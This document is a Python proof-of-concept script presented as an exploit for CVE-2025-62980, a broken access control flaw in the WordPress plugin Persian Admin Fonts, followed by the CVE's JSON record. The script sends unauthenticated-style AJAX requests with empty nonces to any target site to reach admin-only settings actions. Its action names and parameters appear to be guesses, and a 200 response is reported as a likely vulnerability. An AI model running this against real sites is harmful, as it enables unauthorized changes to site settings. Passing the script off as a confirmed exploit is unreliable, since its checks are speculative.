CVE-2025-62980

# CVE-2025-62980 PoC - Persian Admin Fonts Broken Access Control # Target: WordPress site with Persian Admin Fonts plugin <= 4.1.03 import requests import sys def exploit_cve_2025_62980(target_url): """ Exploit for Missing Authorization vulnerability in Persian Admin Fonts This PoC demonstrates accessing admin-only functionality with low-privilege user """ target = target_url.rstrip('/') # Common plugin endpoints to test endpoints = [ '/wp-admin/admin-ajax.php', '/wp-admin/admin.php?page=persian-admin-fonts-settings', ] # Test with low-privilege session (simulate subscriber/contributor account) cookies = { 'wordpress_test_cookie': 'WP+Cookie+check', # Add low-privilege user cookies here } print(f"[*] Testing CVE-2025-62980 on {target}") print(f"[*] Target plugin: Persian Admin Fonts <= 4.1.03") # Test for unprotected AJAX actions test_actions = [ 'persian_admin_fonts_save_settings', 'persian_admin_fonts_update_config', 'paf_save_options', ] for action in test_actions: data = { 'action': action, 'nonce': '', # Add plugin-specific parameters } try: response = requests.post( f"{target}{endpoints[0]}", data=data, cookies=cookies, timeout=10 ) # Check if request was processed without proper authorization if response.status_code == 200: print(f"[!] Potential vulnerability: Action '{action}' may lack authorization") print(f"[!] Response: {response.text[:200]}") except requests.RequestException as e: print(f"[-] Error testing {action}: {e}") print("[*] PoC execution completed") print("[*] Manual verification recommended") if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve_2025_62980_poc.py <target_url>") sys.exit(1) exploit_cve_2025_62980(sys.argv[1])

{"cve": {"id": "CVE-2025-62980", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:58.807", "lastModified": "2026-04-27T17:16:39.540", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in MDZ Persian Admnin Fonts persian-admin-fonts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Persian Admnin Fonts: from n/a through <= 4.1.03."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/persian-admin-fonts/vulnerability/wordpress-persian-admnin-fonts-plugin-4-1-03-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}